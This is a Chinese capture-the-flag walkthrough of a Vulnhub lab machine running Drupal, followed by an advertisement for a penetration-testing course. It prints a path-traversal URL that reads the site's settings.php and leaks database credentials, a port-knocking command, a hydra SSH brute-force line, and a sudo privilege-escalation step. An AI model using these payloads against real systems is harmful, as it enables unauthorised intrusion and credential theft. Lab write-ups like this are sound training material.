点击上方蓝字关注我们
这是网络安全自修室每周带星球小伙伴一起实战的第11台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!
靶机可从Vulnhub平台 免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!
攻击机:Kali Linux
靶机环境:192.168.241.148
所用工具:nmap | knockd | hydra
综上信息搜集可以发现,该目标机器为Linux系统,仅开放了80端口,CMS为Drupal,重点从web页面找突破口
使用msf模块drupal_drupalgeddon2,发现利用失败
使用searchsploit搜下找到一个文件读取漏洞利用
按照这种样式,测试下,发现存在这个漏洞存在用户
root
steve
jan
sam
读取默认的Drupal网站目录配置文件
http://192.168.241.148/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php
拿到数据库配置信息
|array (|
||'database' => 'drupaldb',|
||'username' => 'dbuser',|
||'password' => 'x4lB0XxX',|
||'host' => 'localhost',|
||'port' => '',|
||'driver' => 'mysql',|
||'prefix' => '',|
根据之前的信息发现只开启了80端口,是否22端口存在打开方式,去看看/etc/knockd.conf
文件,果然需要敲5004,4284,6872这3个类似knok
使用knock进行敲门
knock -d 200 192.168.241.148 5004 4284 6872
发现打开22端口了
使用hydra开始密码爆破,拿到sam用户登录shell
hydra -L users.txt -p x4lB0XxX 192.168.241.148 ssh
登录进去发现存在特殊权限的脚本
发现该脚本是直接可写,将/bin/bash写入,用sudo运行拿到root权限
如果想要系统学习网络安全技术
不妨加入知识星球课程
《60天入门网络安全渗透测试》
从入门到案例,贴合实战
轻松易懂、好玩实用
限时领取
知识星球
活动优惠券
跟着60天入门学习路线一起学
期待你的到来!
往期推荐
从入门到入狱的技术,可以学,别乱用!
网络安全学习方向和资源整理(建议收藏)
一个web安全工程师的基础学习规划
资源 | 渗透测试工程师入门教程(限时领取)
5年老鸟推荐10个玩Python必备的网站
推荐十个成为网络安全渗透测试大佬的学习必备网站!
那些社工师不为人知的秘密。。。
更多内容请关注公众号
网络安全自修室
点个在看你最好看